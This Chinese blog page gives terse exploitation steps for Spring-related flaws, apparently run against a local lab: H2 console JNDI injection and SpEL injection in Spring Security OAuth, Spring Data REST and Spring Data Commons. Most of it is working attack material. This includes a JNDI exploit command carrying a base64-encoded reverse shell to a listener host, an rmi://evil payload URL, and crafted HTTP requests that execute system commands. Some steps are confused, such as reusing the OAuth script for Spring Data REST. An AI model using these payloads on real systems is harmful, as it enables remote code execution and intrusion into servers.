赞
踩
H2 Database是一个数据库,springboot如果调用了这个数据库
访问:http://192.168.171.139:8080/h2-console/
javax.naming.InitialContext
rmi://evil:23456/BypassByEL
反弹shell:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3MS4xLzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 192.168.171.1
Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块。
条件:知道认证所需的凭据
工具:Spring_OAuth2_exp.py
http://192.168.171.139:8080/oauth/authorize?response_type=${233*233}&client_id=acme&scope=openid&redirect_uri=http://te123123st
用生成的字符串代替上面的233*233然后访问url即可反弹shell:
Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务,漏洞会导致任意用户使用SpEL表达式来进行命令执行。
反弹shell,使用Spring_OAuth2_exp.py可生成poc。用poc替换下面请求path中的123123。
PATCH /customers/1 HTTP/1.1
Host: 192.168.171.139:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 4394
[{ "op": "replace", "path": “123123/lastname", "value": "vulhub" }]
Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本
中,存在一处SpEL表达式注入漏洞
,攻击者可以注入恶意SpEL表达式以执行任意命令。
在注册的时候抓包
POST /users?page=&size=5 HTTP/1.1 Host: 192.168.171.139:8080 Connection: keep-alive Content-Length: 123 Pragma: no-cache Cache-Control: no-cache Origin: http://localhost:8080 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: http://localhost:8080/users?page=0&size=5 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/333333")]=&password=&repeatedPassword=
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。